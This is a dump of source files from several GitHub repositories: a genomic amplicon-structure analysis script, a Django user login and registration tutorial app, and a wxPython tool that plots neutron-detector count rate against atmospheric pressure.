in range(max_segment+1):\r\n if not visited.has_key(u):\r\n visited[u] = con_comp\r\n dfs(a,visited,u,con_comp)\r\n con_comp += 1\r\n\r\n # dfsegments['Amplicon ID']=dfsegments['Segment ID'].map(visited.get)\r\n dfcnv['Amplicon ID'] = dfcnv['Segment ID'].map(visited.get)\r\n\r\n dfamplicons = pd.DataFrame(dfcnv[['Amplicon ID','Segment ID','segment_size']].groupby('Amplicon ID').agg({'Segment ID':'count', 'segment_size':'sum',}))\r\n dfamplicons = dfamplicons[dfamplicons['segment_size']>0]\r\n dfamplicons.reset_index(inplace=True)\r\n dfamplicons.rename(columns={'Segment ID':'nsegments_in_amplicon','segment_size': 'amplicon_size'}, inplace=True)\r\n\r\n return dfcnv, dfamplicons\r\n\r\n\r\ndef updateAmpliconsInSVs(dfcnv, dfsv):\r\n '''\r\n Assign Amplicon ID for segments in dfcnv and dfsv\r\n :param dfcnv: df of cnv\r\n 
:param dfsv: df of sv\r\n :param dfsegments: df of segments\r\n :return: updated dfcnv and dfsv\r\n '''\r\n \"\"\" assign amplicons to segments and to breakpoints\"\"\"\r\n dfsv = pd.merge(dfsv,dfcnv[['Segment ID','Amplicon ID']],how='left',left_on = 'Segment1 ID',right_on = 'Segment ID',sort=False)\r\n del dfsv['Segment ID']\r\n\r\n dfsv = pd.merge(dfsv,dfcnv[['Segment ID','Amplicon ID']],how='left',left_on = 'Segment2 ID',right_on = 'Segment ID',sort=False, suffixes=['1','2'])\r\n del dfsv['Segment ID']\r\n\r\n dfsv = dfsv.rename(columns={'Amplicon ID1': 'Amplicon1 ID', 'Amplicon ID2': 'Amplicon2 ID'})\r\n dfsv.loc[dfsv['Amplicon1 ID'].isnull(),'Amplicon1 ID'] = dfsv['Amplicon2 ID']\r\n del dfsv['Amplicon2 ID']\r\n dfsv = dfsv.rename(columns={'Amplicon1 ID':'Amplicon ID'})\r\n dfsv.dropna(inplace=True, subset=['Amplicon ID'])\r\n dfsv['Amplicon ID'] = dfsv['Amplicon ID'].astype(int)\r\n\r\n # dfcnv = pd.merge(dfcnv,dfsegments[['Segment ID','Amplicon ID']],how='left',on='Segment ID',sort=False)\r\n\r\n return dfcnv, dfsv\r\n\r\n\r\ndef setStructureTypeToSV(dfsv):\r\n if dfsv.empty:\r\n return dfsv\r\n\r\n dfsv['Structure Type'] = None\r\n\r\n for i, row in dfsv.iterrows():\r\n structure_type = 'Other'\r\n if not (pd.isnull(row['Segment1 ID']) or pd.isnull(row['Segment2 ID'])):\r\n if row['Segment1 ID']==row['Segment2 ID']:\r\n if row['edge1']=='middle' and row['edge2']=='middle' and row['Type']== 'DEL':\r\n structure_type = np.NaN\r\n#michalin\r\n# elif row['edge1']==row['edge2'] and not row['edge1']=='middle':\r\n elif row['edge1']==row['edge2']:\r\n if row['Type']=='INV':\r\n structure_type = 'ID'\r\n elif row['Type']=='ITX' and not (row['edge1']=='middle' and row['edge2']=='middle'):\r\n structure_type = 'TR'\r\n else:\r\n structure_type = 'DM'\r\n else:\r\n structure_type = np.NaN\r\n dfsv.loc[i, 'Structure Type'] = structure_type\r\n\r\n return dfsv\r\n\r\ndef assignAmpliconStructureType(dfamplicon, dfsv):\r\n if dfsv.empty:\r\n return pd.DataFrame()\r\n\r\n grouped_by_amp = dfsv.groupby(['Amplicon ID', 'Structure Type'], as_index = False)\r\n df_amp_counts = grouped_by_amp['num_Reads'].agg({'num_Reads': 'sum'})\r\n\r\n df_amp_counts = df_amp_counts.set_index(['Amplicon ID', 'Structure Type'])['num_Reads'].unstack().reset_index()\r\n df_amp_counts.columns = df_amp_counts.columns.tolist()\r\n\r\n # if len(df_amp_counts) == 0:\r\n # return pd.DataFrame()\r\n\r\n for m in mut_types:\r\n if not m in df_amp_counts.columns:\r\n df_amp_counts[m] = np.NaN\r\n df_amp_counts[m] = df_amp_counts[m].apply(pd.to_numeric, errors='ignore')\r\n\r\n # find the winner structure type for each edge based on majority of supporting reads\r\n\r\n dfamplicon = pd.merge(dfamplicon, df_amp_counts[['Amplicon ID'] + mut_types], how='left', on='Amplicon ID', copy=False)\r\n dfamplicon['Winner_Amplicon_Structure'] = dfamplicon[mut_types].idxmax(axis=1)\r\n\r\n return dfamplicon\r\n\r\ndef assignSegmentStructureType(dfsv):\r\n if dfsv.empty:\r\n return pd.DataFrame()\r\n\r\n # create a dataframe where each row contains one edge of the BP\r\n df_bp1 = pd.DataFrame(data={'Segment ID': dfsv['Segment1 ID'], 'num_Reads': dfsv['num_Reads'], 'Structure Type': dfsv['Structure Type'], 'orig_ind':dfsv.index})\r\n df_bp2 = pd.DataFrame(data={'Segment ID': dfsv['Segment2 ID'], 'num_Reads': dfsv['num_Reads'], 'Structure Type': dfsv['Structure Type'],'orig_ind': dfsv.index})\r\n\r\n df_bps = pd.concat([df_bp1, df_bp2])\r\n # workarround what seems to be a bug in drop_duplicates\r\n df_bps[\"joined\"] = df_bps[\"Segment 
ID\"].map(str) + \"\" + df_bps[\"orig_ind\"].map(str)\r\n df_bps.reset_index(drop=True, inplace=True)\r\n\r\n # if two sides of bp are the same segment, remove one of it\r\n #df_bps.drop_duplicates(subset=['Segment ID', 'orig_ind'], inplace=True)\r\n df_bps.drop_duplicates(subset='joined', inplace=True)\r\n\r\n grouped_by_segment = df_bps.groupby(['Segment ID', 'Structure Type'], as_index = False)\r\n dfsegment_counts = grouped_by_segment['num_Reads'].agg({'num_Reads': 'sum'})\r\n\r\n dfsegment_counts = dfsegment_counts.set_index(['Segment ID', 'Structure Type'])['num_Reads'].unstack().reset_index()\r\n dfsegment_counts.columns = dfsegment_counts.columns.tolist()\r\n\r\n # if len(df_amp_counts) == 0:\r\n # return pd.DataFrame()\r\n\r\n for m in mut_types:\r\n if not m in dfsegment_counts.columns:\r\n dfsegment_counts[m] = np.NaN\r\n dfsegment_counts[m] = dfsegment_counts[m].apply(pd.to_numeric, errors='ignore')\r\n\r\n # find the winner structure type for each edge based on majority of supporting reads\r\n\r\n dfsegment = dfsegment_counts[['Segment ID'] + mut_types]\r\n dfsegment.loc[:,'Winner_Segment_Structure'] = dfsegment[mut_types].idxmax(axis=1)\r\n\r\n return dfsegment\r\n\r\n\r\n\r\ndef run(excel, remove_unmappble, unify_seg, config_file, sample_id, cnv_file, sv_file, fast_output_dir, focused_genes):\r\n '''\r\n main run\r\n :param excel: flag: should we output to excel file\r\n :param remove_unmappble: flag: should we remove unmappble regions\r\n :param config_file: configuration file\r\n :param sample_id: sample ID\r\n :param cnv_file: path to cnv file\r\n :param sv_file: path to sv file\r\n :param fast_output_dir: output directory\r\n :param focused_genes: focused genes list\r\n :return: --\r\n '''\r\n\r\n if not os.path.exists(fast_output_dir):\r\n os.makedirs(fast_output_dir)\r\n\r\n # Read Data\r\n dfcnv = readCNVData(cnv_file, remove_unmappble, unify_seg)\r\n dfsv = readSVData(sv_file)\r\n\r\n dfsv = assignSegmentsForSVs(dfcnv, dfsv)\r\n # dfsv, dfsegments = assignSegmentsForSVs(dfcnv, dfsv)\r\n\r\n # Amplicons Handing\r\n dfcnv, dfamplicons = createAmpliconFromConnectedSegments(dfcnv['Segment ID'].max(), dfsv, dfcnv)\r\n dfcnv, dfsv = updateAmpliconsInSVs(dfcnv, dfsv)\r\n\r\n # Define Structure Type\r\n dfsv = setStructureTypeToSV(dfsv)\r\n dfamplicons = assignAmpliconStructureType(dfamplicons, dfsv)\r\n\r\n dfsegments = assignSegmentStructureType(dfsv)\r\n\r\n # focused genes\r\n\r\n df_focused_genes = segments2FocusedGenes(dfcnv, dfamplicons, dfsegments, focused_genes)\r\n if len(dfamplicons)>0:\r\n df_amp_gene = pd.merge(dfamplicons, df_focused_genes[['Amplicon ID', 'Gene']], how='left', left_on='Amplicon ID', right_on='Amplicon ID', copy=False)\r\n temp = df_amp_gene.groupby('Amplicon ID')['Gene'].apply(lambda g: ', '.join([x for x in g if isinstance(x,str)])).to_frame().reset_index()\r\n dfamplicons = pd.merge(dfamplicons, temp, how='left', on='Amplicon ID', copy=False)\r\n\r\n\r\n dfsegment_gene = pd.merge(dfcnv, df_focused_genes[['Segment ID', 'Gene']], how='left', left_on='Segment ID', right_on='Segment ID', copy=False)\r\n temp = dfsegment_gene.groupby('Segment ID')['Gene'].apply(lambda g: ', '.join([x for x in g if isinstance(x,str)])).to_frame().reset_index()\r\n dfcnv = pd.merge(dfcnv, temp, how='left', on='Segment ID', copy=False)\r\n\r\n # write to csv files\r\n df_focused_genes.to_csv(open(os.path.join(fast_output_dir, sample_id + '_focused_genes_FAST.csv'), 'w'))\r\n dfamplicons.to_csv(open(os.path.join(fast_output_dir, sample_id + 
    dfsegments.to_csv(open(os.path.join(fast_output_dir, sample_id + '_segments_FAST.csv'), 'w'))\r\n    dfcnv.to_csv(open(os.path.join(fast_output_dir, sample_id + '_cnv_FAST.csv'),'w'))\r\n    dfsv.to_csv(open(os.path.join(fast_output_dir, sample_id + '_sv_FAST.csv'),'w'))\r\n    shutil.copyfile(config_file,os.path.join(fast_output_dir, sample_id + '_config.txt'))\r\n\r\n    if excel:\r\n        write_excel(fast_output_dir, sample_id, dfcnv, dfsv, dfamplicons, dfsegments, df_focused_genes)\r\n\r\nif __name__==\"__main__\":\r\n\r\n    parser = argparse.ArgumentParser(description='Analyze amplicon structure based on CNV and SV data.')\r\n    parser.add_argument('--config', '-c', type=str, required = True)\r\n    parser.add_argument('--excel', '-e', action='store_true', default = False, help = 'generate colored excel file')\r\n    parser.add_argument('--remove_unmappble', '-r', action='store_true', default = False, help = 'remove unmappable regions')\r\n    parser.add_argument('--not_unify_seg', '-n', action='store_true', default=False, help='do not unify consecutive segments')\r\n\r\n    args = parser.parse_args()\r\n\r\n    CP.readfp(open(args.config))\r\n\r\n    timestr = time.strftime(\"%Y%m%d_%H%M%S\")\r\n    log = 'Fast_log_%s.csv' % timestr\r\n    f_log = open(os.path.join(CP.get('FILES', 'FAST_OUTPUT_DIR'), log),'w')\r\n\r\n    focused_locuses = [FL(*fl) for fl in csv.reader(open(CP.get('FILES','GENES')))]\r\n\r\n    sample_id = CP.get('FILES','SAMPLE_ID')\r\n    run(args.excel, args.remove_unmappble, not (args.not_unify_seg), args.config, sample_id, CP.get('FILES', 'CNV_INP'),\r\n        CP.get('FILES', 'SV_INP'), CP.get('FILES', 'FAST_OUTPUT_DIR'), focused_locuses)\r\n    # try:\r\n    #     run(args.excel, args.remove_unmappble, not (args.not_unify_seg), args.config, sample_id, CP.get('FILES', 'CNV_INP'), CP.get('FILES', 'SV_INP'), CP.get('FILES', 'FAST_OUTPUT_DIR'), focused_locuses)\r\n    # except Exception as E:\r\n    #     print >> f_log, '%s, %s, FAILED: %s' % (datetime.datetime.now(), sample_id, E)\r\n    # else:\r\n    #     print >> f_log, '%s, %s, SUCCESS' % (datetime.datetime.now(), sample_id)\r\n    #\r\n    # f_log.close()\r\n" }
4
siddharth-arora/django-deployment-example
https://github.com/siddharth-arora/django-deployment-example
f9e146e520c7f1cbada82c6b1af223c5f198c88d
8a739a8100967cbded8fa5cd90e24aad9bdbb861
ac2c5237fa5af08eef047c1b818ec78dc0ea485f
refs/heads/master
2020-07-25T23:31:24.360068
2019-09-21T06:48:22
2019-09-21T06:48:22
208,456,732
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6034953594207764, "alphanum_fraction": 0.6048607230186462, "avg_line_length": 33.224300384521484, "blob_id": "183d61ab9af8d06ec733bcd477d92cdb416c9fce", "content_id": "1b376cf1d38810f3d924f12318ff6019fff4879d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3662, "license_type": "no_license", "max_line_length": 113, "num_lines": 107, "path": "/user_management_project/basic_app/views.py", "repo_name": "siddharth-arora/django-deployment-example", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom basic_app.forms import UserForm, UserProfileInfoForm\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.urls import reverse\n\n# Create your views here.\ndef index(request):\n return render(request,'basic_app/index.html')\n\ndef user_login(request):\n #check if the form has been submitted\n if request.method == 'POST':\n #get the data from the form\n uname = request.POST.get('username')\n passw = request.POST.get('password')\n #authenticate the user\n user = authenticate(username=uname, password=passw)\n #check if the user is autheticated or not\n if user:\n #check if the user is an active user\n if user.is_active:\n #user is autheticated & active\n #print(\"user is autheticated & active\")\n #login the user - activate the login status of the user\n login(request, user)\n #print(\"user logged in\")\n #redirect the user to the post login Page\n #return HttpResponseRedirect('URL')\n #or\n #return HttpResponseRedirect(reverse('URL_Name'))\n return HttpResponseRedirect(reverse('userhome'))\n else:\n #user is autheticated & inactive\n #print(\"user is autheticated & inactive\")\n #display some message on the screen\n return HttpResponse(\"<h1>User Inactive!</h1>\")\n else:\n #print(\"Unauthenticated Login attempt!\")\n #display some message on the screen\n #return HttpResponse(\"<h1>User Unauthenticated!</h1>\")\n return render(request,'basic_app/login.html',{'err':'Invalid User Credentials!'})\n\n else:\n return render(request,'basic_app/login.html')\n\n@login_required\ndef userhome(request):\n return render(request, 'basic_app/userhome.html')\n\n@login_required\ndef userlogout(request):\n #logout the user programatically\n logout(request)\n #redirect the user\n return HttpResponseRedirect(reverse('login'))\n\ndef register(request):\n\n registered = False\n\n if request.method == 'POST':\n #form submitted\n user_form = UserForm(data=request.POST)\n profile_form = UserProfileInfoForm(data=request.POST)\n #check form validity\n if user_form.is_valid() and profile_form.is_valid():\n #form is valid\n\n #save the user_form\n user = user_form.save()\n #hash the password\n user.set_password(user.password)\n #save\n user.save()\n\n #save the profile_form - but do not commit the changes as yet as the file & other data is not present\n profile = profile_form.save(commit=False)\n #set the profile's user\n profile.user = user\n\n #update profile_pic\n if 'profile_pic' in request.FILES:\n profile.profile_pic = request.FILES['profile_pic']\n\n #finally save the profile form\n profile.save()\n\n registered=True\n else:\n #form is invalid\n print(user_form.errors)\n print(profile_form.errors)\n else:\n #1st time load\n #create empty forms\n user_form = UserForm()\n profile_form = UserProfileInfoForm()\n\n\n return render(request,'basic_app/register.html',\n {\n 'user_form' 
: user_form,\n 'profile_form' : profile_form,\n 'registered' : registered\n })\n" }, { "alpha_fraction": 0.7195876240730286, "alphanum_fraction": 0.7195876240730286, "avg_line_length": 31.33333396911621, "blob_id": "e0ade41c5312e7e2d9917941c68b12a4854e24f7", "content_id": "b722cb01e0f6b0b41197ec1ead056fb7daae365e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 485, "license_type": "no_license", "max_line_length": 72, "num_lines": 15, "path": "/user_management_project/basic_app/models.py", "repo_name": "siddharth-arora/django-deployment-example", "src_encoding": "UTF-8", "text": "from django.db import models\n#import User object\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass UserProfileInfo(models.Model):\n #declare a foreign key object of the User\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n #additional features\n portfolio_site = models.URLField(blank=True)\n profile_pic = models.ImageField(blank=True,upload_to='profile_pics')\n\n #__str__()\n def __str__(self):\n return self.user.username\n" } ]
2
eskaler/Uragan
https://github.com/eskaler/Uragan
5970d3f976cd9638a35ea47b31d70b060c766547
be6936058917ee549ecb4b7efa878b6d429d6975
769f41268f40d8c123a2963be6ce5dc0d02e84f0
refs/heads/master
2021-07-17T11:44:42.750686
2020-07-15T06:50:15
2020-07-15T06:50:15
192,679,802
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5724172592163086, "alphanum_fraction": 0.6036239862442017, "avg_line_length": 35.962791442871094, "blob_id": "e33f1df0e6b3349b413f4b141195c3e83e27757e", "content_id": "d909205bbb9f26d4438c454c6ef75ad0a1966278", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8089, "license_type": "no_license", "max_line_length": 199, "num_lines": 215, "path": "/fbp/form.py", "repo_name": "eskaler/Uragan", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n###########################################################################\n## Python code generated with wxFormBuilder (version Jun 17 2015)\n## http://www.wxformbuilder.org/\n##\n## PLEASE DO \"NOT\" EDIT THIS FILE!\n###########################################################################\n\nimport wx\n\n\nimport wx.xrc\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_wxagg import \\\nFigureCanvasWxAgg as FigureCanvas\nfrom matplotlib.backends.backend_wx import NavigationToolbar2Wx\nfrom detectorData import DetectorData\n\n###########################################################################\n## Class mainFrame\n###########################################################################\n\nclass mainFrame ( wx.Frame ):\n\n Data = None\n\n def __init__( self, parent ):\n wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u\"Обработка данных детектора\", pos = wx.DefaultPosition, size = wx.Size( 737,425 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL )\n\n self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize )\n\n bSizer1 = wx.BoxSizer( wx.VERTICAL )\n\n self.m_panel2 = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )\n self.m_panel2.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )\n self.m_panel2.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_3DLIGHT ) )\n\n bSizer61 = wx.BoxSizer( wx.VERTICAL )\n\n gSizer21 = wx.GridSizer( 0, 2, 0, 0 )\n\n bSizer6 = wx.BoxSizer( wx.VERTICAL )\n\t\t\n self.graphPanel1 = wx.Panel( self.m_panel2, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )\n bSizer14 = wx.BoxSizer( wx.VERTICAL )\n\t\t\n\t\t\n self.graphPanel1.SetSizer( bSizer14 )\n self.graphPanel1.Layout()\n bSizer14.Fit( self.graphPanel1 )\n bSizer6.Add( self.graphPanel1, 1, wx.EXPAND |wx.ALL, 5 )\n\n###########\n self.figure1 = Figure()\n #self.axes1 = self.figure.add_subplot(111)\n self.canvas1 = FigureCanvas(self, wx.ID_ANY, self.figure1)\n bSizer14.Add(self.canvas1, 1, wx.LEFT | wx.TOP | wx.EXPAND)\n self.toolbar1 = NavigationToolbar2Wx(self.canvas1)\n self.toolbar1.Realize()\n bSizer14.Add(self.toolbar1, 0, wx.LEFT | wx.EXPAND)\n self.toolbar1.Show()\n self.Fit()\n################\n\n gSizer21.Add( bSizer14, 2, wx.EXPAND, 5 )\n\n bSizer7 = wx.BoxSizer( wx.VERTICAL )\n\n self.m_staticText4 = wx.StaticText( self.m_panel2, wx.ID_ANY, u\"MyLabel\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText4.Wrap( -1 )\n self.m_staticText4.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_INFOTEXT ) )\n\n bSizer7.Add( self.m_staticText4, 0, wx.ALL, 5 )\n\n self.m_staticText5 = wx.StaticText( self.m_panel2, wx.ID_ANY, u\"MyLabel\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText5.Wrap( -1 )\n self.m_staticText5.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_INFOTEXT ) )\n\n bSizer7.Add( self.m_staticText5, 0, wx.ALL, 5 )\n\n self.m_staticText6 = wx.StaticText( self.m_panel2, wx.ID_ANY, u\"MyLabel\", 
wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText6.Wrap( -1 )\n self.m_staticText6.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_INFOTEXT ) )\n\n bSizer7.Add( self.m_staticText6, 0, wx.ALL, 5 )\n\n\n gSizer21.Add( bSizer7, 0, wx.EXPAND, 5 )\n\n\n bSizer61.Add( gSizer21, 1, wx.EXPAND, 5 )\n\n gSizer3 = wx.GridSizer( 0, 2, 0, 0 )\n\n bSizer62 = wx.BoxSizer( wx.VERTICAL )\n\n\n gSizer3.Add( bSizer62, 1, wx.EXPAND, 5 )\n\n bSizer71 = wx.BoxSizer( wx.VERTICAL )\n\n self.m_staticText41 = wx.StaticText( self.m_panel2, wx.ID_ANY, u\"MyLabel\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText41.Wrap( -1 )\n self.m_staticText41.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_INFOTEXT ) )\n\n bSizer71.Add( self.m_staticText41, 0, wx.ALL, 5 )\n\n self.m_staticText51 = wx.StaticText( self.m_panel2, wx.ID_ANY, u\"MyLabel\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText51.Wrap( -1 )\n self.m_staticText51.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_INFOTEXT ) )\n\n bSizer71.Add( self.m_staticText51, 0, wx.ALL, 5 )\n\n self.m_staticText61 = wx.StaticText( self.m_panel2, wx.ID_ANY, u\"MyLabel\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText61.Wrap( -1 )\n self.m_staticText61.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_INFOTEXT ) )\n\n bSizer71.Add( self.m_staticText61, 0, wx.ALL, 5 )\n\n\n gSizer3.Add( bSizer71, 1, wx.EXPAND, 5 )\n\n\n bSizer61.Add( gSizer3, 1, wx.EXPAND, 5 )\n\n\n self.m_panel2.SetSizer( bSizer61 )\n self.m_panel2.Layout()\n bSizer61.Fit( self.m_panel2 )\n bSizer1.Add( self.m_panel2, 1, wx.EXPAND, 5 )\n\n\n self.SetSizer( bSizer1 )\n self.Layout()\n self.m_menubar1 = wx.MenuBar( 0 )\n self.m_menu1 = wx.Menu()\n self.m_menuItem1 = wx.MenuItem( self.m_menu1, wx.ID_ANY, u\"Открыть...\", wx.EmptyString, wx.ITEM_NORMAL )\n self.m_menu1.AppendItem( self.m_menuItem1 )\n\n self.m_menu1.AppendSeparator()\n\n self.m_menuItem2 = wx.MenuItem( self.m_menu1, wx.ID_ANY, u\"Выход\", wx.EmptyString, wx.ITEM_NORMAL )\n self.m_menu1.AppendItem( self.m_menuItem2 )\n\n self.m_menubar1.Append( self.m_menu1, u\"Файл\" )\n\n self.m_menu2 = wx.Menu()\n self.m_menuItem3 = wx.MenuItem( self.m_menu2, wx.ID_ANY, u\"График 1\", wx.EmptyString, wx.ITEM_CHECK )\n self.m_menu2.AppendItem( self.m_menuItem3 )\n self.m_menuItem3.Check( True )\n\n self.m_menuItem4 = wx.MenuItem( self.m_menu2, wx.ID_ANY, u\"График 2\", wx.EmptyString, wx.ITEM_CHECK )\n self.m_menu2.AppendItem( self.m_menuItem4 )\n self.m_menuItem4.Check( True )\n\n self.m_menubar1.Append( self.m_menu2, u\"Показать\" )\n\n self.SetMenuBar( self.m_menubar1 )\n\n\n self.Centre( wx.BOTH )\n\n # COnnect events\n self.Bind( wx.EVT_MENU, self.openFile, id = self.m_menuItem1.GetId() )\n self.Bind( wx.EVT_MENU, self.showGraph1, id = self.m_menuItem3.GetId() )\n\n def showGraph1( self, event ):\n if self.m_menuItem3.IsChecked() == False:\n self.graphPanel1.Hide()\n self.canvas1.Hide()\n self.toolbar1.Hide()\n else:\n self.graphPanel1.Show()\n self.canvas1.Show()\n self.toolbar1.Show()\n\n def __del__( self ):\n pass\n\n\n def openFile( self, event ):\n with wx.FileDialog(self, \"Открыть файл данных детектора\", wildcard=\"DAT файлы (*.dat)|*.dat\",\n style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST) as fileDialog:\n\n if fileDialog.ShowModal() == wx.ID_CANCEL:\n return # the user changed their mind\n\n # Proceed loading the file chosen by the user\n pathname = fileDialog.GetPath()\n try:\n self.Data = DetectorData(pathname)\n self.axes1 = 
self.figure1.add_subplot(111)\n self.axes1.plot( self.Data.datTim, self.Data.inten )\n self.axes1.set_xlabel(\"Время хуемя\")\n self.axes1.set_ylabel(\"Интенсивность\")\n\n self.axes2 = self.figure1.add_subplot(111)\n self.axes2.plot( self.Data.datTim, self.Data.press )\n self.axes2.set_ylabel(\"Давление\")\n\n except IOError:\n wx.LogError(\"Не удалось открыть файл '%s'.\" % newfile)\n\nclass DetectorApp(wx.App):\n\n # wxWidgets calls this method to initialize the application\n def OnInit(self):\n\n # Create an instance of our customized Frame class\n frame = mainFrame(None)\n frame.Show(True)\n\n # Return a success flag\n return True\n" }, { "alpha_fraction": 0.805084764957428, "alphanum_fraction": 0.805084764957428, "avg_line_length": 18.66666603088379, "blob_id": "3f3acd8092560f541e10dd886e0d4ba37a2e06f1", "content_id": "bd920b6c5bba00e8abca9d3e02905342d6203694", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 118, "license_type": "no_license", "max_line_length": 31, "num_lines": 6, "path": "/main.py", "repo_name": "eskaler/Uragan", "src_encoding": "UTF-8", "text": "import detectorApp\nimport numpy.core._methods\nimport numpy.lib.format\n\napp = detectorApp.DetectorApp()\napp.MainLoop()\n" }, { "alpha_fraction": 0.5792239904403687, "alphanum_fraction": 0.6068944334983826, "avg_line_length": 37.278106689453125, "blob_id": "4b26bf7e1463522d051d6371bc82fdfa11f730ec", "content_id": "f8f8e8550516ac2cdf244806e425c1becc1d5739", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6667, "license_type": "no_license", "max_line_length": 170, "num_lines": 169, "path": "/detectorApp.py", "repo_name": "eskaler/Uragan", "src_encoding": "UTF-8", "text": "import wx\nimport wx.xrc\nfrom detectorData import DetectorData\nimport detectorForm\nfrom matplotlib import dates\nfrom functools import partial\n#import numpy as np\n\nclass EventHandler(detectorForm.MainFrame):\n \"\"\"Класс наследующий форму и содержащий обработку ее событий\"\"\"\n\n Data = []\n\n def __init__(self):\n\n self.initForm(None)\n #бинды на события\n self.Bind( wx.EVT_MENU, self.openFile, id = self.m_mbopenFile.GetId() )\n self.Bind( wx.EVT_MENU, self.exitApp, id = self.m_mbexit.GetId() )\n #self.Bind( wx.EVT_MENU, self.showGraph1, id = self.m_mbGraph1.GetId() )\n #self.Bind( wx.EVT_MENU, self.showGraph2, id = self.m_mbGraph2.GetId() )\n self.m_checkBox1.Bind(wx.EVT_CHECKBOX, lambda evt, checkit=self.m_checkBox1, figure=self.figure1, axisno=0 : self.hideGraph(evt, checkit, figure, axisno))\n self.m_checkBox2.Bind(wx.EVT_CHECKBOX, lambda evt, checkit=self.m_checkBox2, figure=self.figure1, axisno=1 : self.hideGraph(evt, checkit, figure, axisno))\n self.m_checkBox3.Bind(wx.EVT_CHECKBOX, lambda evt, checkit=self.m_checkBox3, figure=self.figure1, axisno=2 : self.hideGraph(evt, checkit, figure, axisno))\n #self.m_checkBox1.Bind(wx.EVT_CHECKBOX, partial( self.hideGraph, checkit=self.m_checkBox1.IsChecked, figure=self.figure1, axisno=0))\n\n\n\n def openFile(self, event):\n with wx.FileDialog(self, \"Открыть файл данных детектора\", wildcard=\"DAT файлы (*.dat)|*.dat\",\n style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST) as fileDialog:\n\n if fileDialog.ShowModal() == wx.ID_CANCEL:\n return\n\n\n pathname = fileDialog.GetPath()\n try:\n\n self.Data = DetectorData(pathname)\n self.drawGraph1()\n\n self.SetTitle(pathname)\n self.m_checkBox1.SetValue(True)\n self.m_checkBox2.SetValue(True)\n self.m_checkBox3.SetValue(True)\n\n except 
IOError:\n                wx.LogError(\"Не удалось открыть файл '%s'.\" % pathname)\n\n    def drawGraph1(self):\n\n        self.figure1.clear()\n\n        self.axes1 = self.figure1.add_subplot(111)\n        self.axes1.plot_date( self.Data.datTim, self.Data.inten, 'b' )\n        self.axes1.set_xlabel(\"Дата\")\n        self.axes1.set_ylabel(r\"Темп счета нейтронов, \"+self.Data.intenName, color='blue')\n        self.axes1.xaxis.set_major_formatter(dates.DateFormatter('%d-%m-%Y %H:%M'))\n\n        self.axes2 = self.axes1.twinx()\n        self.axes2.plot_date( self.Data.datTim, self.Data.press, '#FFA500' )\n        self.axes2.set_ylabel(\"Давление, $мбар$\", color='#FFA500')\n\n        self.axes1f = self.axes1.twiny()\n        self.axes1f.set_xticklabels([])\n        self.axes1f.plot_date( self.Data.datTim, self.Data.intenFixed, 'g' )\n\n        self.figure1.autofmt_xdate(bottom=0.18)\n\n        self.canvas1.draw()\n        self.canvas1.Refresh()\n        print(self.figure1.axes)\n\n        # right-hand figure: count rate vs pressure, with the linear fit\n        self.figure2.clear()\n\n        self.axes3 = self.figure2.add_subplot(111)\n        self.axes3.plot( self.Data.press, self.Data.inten, linestyle='None', marker='o', markerfacecolor='white', color='b' )\n        self.axes3.set_ylabel(r\"Темп счета нейтронов, \"+self.Data.intenName)\n        self.axes3.set_xlabel(\"Давление, $мбар$\")\n        self.axes3.text(0.6, 0.8, 'A = {0} {1}\\nB = {2} {3} {4}'.format(self.Data.A,\n            self.Data.intenName, self.Data.B, self.Data.intenName, '$мбар^{-1}$'), color='r', horizontalalignment='left',\n            verticalalignment='center', transform = self.axes3.transAxes)\n\n\n        self.axes4 = self.figure2.add_subplot(111)\n        self.axes4.plot( self.Data.press, self.Data.intenFixed, linestyle='None', marker='o', markerfacecolor='white', color='g')\n\n        self.axes3f = self.axes3.twiny()\n        self.axes3f.plot(self.Data.press, self.Data.p(self.Data.press), color='r')\n\n\n        self.canvas2.draw()\n        self.canvas2.Refresh()\n\n\n        #\n\n        # update the summary statistics labels\n        self.m_staticText4.SetLabel(\"min: {0}\\nmax: {1}\\navg: {2}\".format(self.Data.iMin, self.Data.iMax, self.Data.I0[0]))\n        self.m_staticText5.SetLabel(\"min: {0}\\nmax: {1}\\navg: {2}\".format(self.Data.pMin, self.Data.pMax, self.Data.P0[0]))\n        self.m_staticText6.SetLabel(\"min: {0}\\nmax: {1}\\navg: 